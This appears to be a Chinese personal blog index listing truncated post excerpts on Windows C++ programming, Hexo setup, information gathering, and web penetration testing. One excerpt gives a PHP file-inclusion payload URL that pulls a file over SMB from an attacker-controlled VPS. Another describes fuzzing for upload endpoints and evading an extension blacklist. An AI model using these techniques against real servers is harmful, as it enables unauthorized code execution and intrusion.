windows编程消息处理 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990#include<Windows.h> 2021-08-23 Windows Windows C++
windows编程第一个窗口程序 123456789101112typedef struct tagWNDCLASSW { UINT style; WNDPROC lpfnWndProc; int cbClsExtra; int cbWndExtra; HINSTANCE hInstance; HICON hIcon; HCURSOR hCursor; 2021-08-23 Windows Windows C++
windows编程字符串处理 tchar 是14的原因是 因为他是由环境决定 当前环境 默认是Unicode的 WCHAR 型 所以 和WCHAR 型的大小一样 如果 改变环境 tchar的大小也会跟着改变 改变之后 tchar的大小就变为7了 然后MessageBox函数如果用tchar类型 就不用管环境是什么了 因为tchar自动根据环境来变化 12345678910111 2021-08-23 Windows Windows C++
文件上传绕过思路拓展 案例一一次项目渗透时,通过往png后缀随便加个字符可知该上传点为白名单上传,正常情况下无法绕过 通过观察接口信息,发现接口名字为UploadImg,猜测该接口用于图片上传,按照开发的习惯,保不准会存在temp、test,这类的接口,随后通过fuzz找到存在的上传接口(file),但此时的接口(file)上传文件仍旧存在限制,需要绕过。 由于黑名单限制不够严谨,经过多个伪后缀尝试,发现.cer后 2021-08-23 文件上传 web
从控制台到窗口程序 从控制台到窗口程序 如果不知道函数什么意思 直接选中函数 然后按F1 可以直接打开文档 直接按F1 查看参数配置 MessageBox 消息框函数: 显示一个模式对话框,其中包含一个系统图标、一组按钮和一条特定于应用程序的简短消息,例如状态或错误信息。 消息框返回一个整数值,指示用户单击了哪个按钮。 语法: 123456int MessageBox( HWN 2021-08-21 Windows Windows C++
php文件包含漏洞(allow_url_include=Off)的绕过方法 分享几个当allow_url_include = Off时的文件包含漏洞的绕过方法。 假设服务端的php代码(aaa.php)如下图所示: 第1种:smb协议Payload:http://127.0.0.1/aaa.php?path=\\43.5*.**.74\ica\abc1238.htm 这种方法只适用于Windows类型的网站服务器,不能用于Linux服务器. 首先在VPS上搭建Samb 2021-08-21 PHP web PHP
信息收集 信息收集信息收集是渗透最重要的阶段,通过一系列的操作尽可能多的收集到多的目标的各种信息,只有先收集到多的信息之后才有利于后续的渗透。 信息收集方式主动收集:与目标主机进行直接交互,从而拿到目标信息,缺点是会记录自己的操作信息 被动收集:不与目标主机进行直接交互,通过搜索引擎或者社会工程等方式间接的获取目标主机的信息 一、收集域名信息知道目标的域名之后,我们要做的第一件事就是获取域名的注册信息,包括 2021-05-17 信息收集 web
Hexo博客搭建 安装安装前提安装 Hexo 相当简单,只需要先安装下列应用程序即可: Node.js(Node.js 版本需不低于 10.13,建议使用 Node.js 12.0 及以上版本) Git如果您的电脑中已经安装上述必备程序,那么恭喜您!你可以直接前往 安装 Hexo 步骤。如果您的电脑中尚未安装所需要的程序,请根据以下安装指示完成安装。安装 Git Windows:下载并安装 git. Mac:使用 2021-05-16 其他 hexo
Hello World Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using Hexo, you can find the answer in troubleshooting or you can ask me on GitHub. Quick 2021-05-16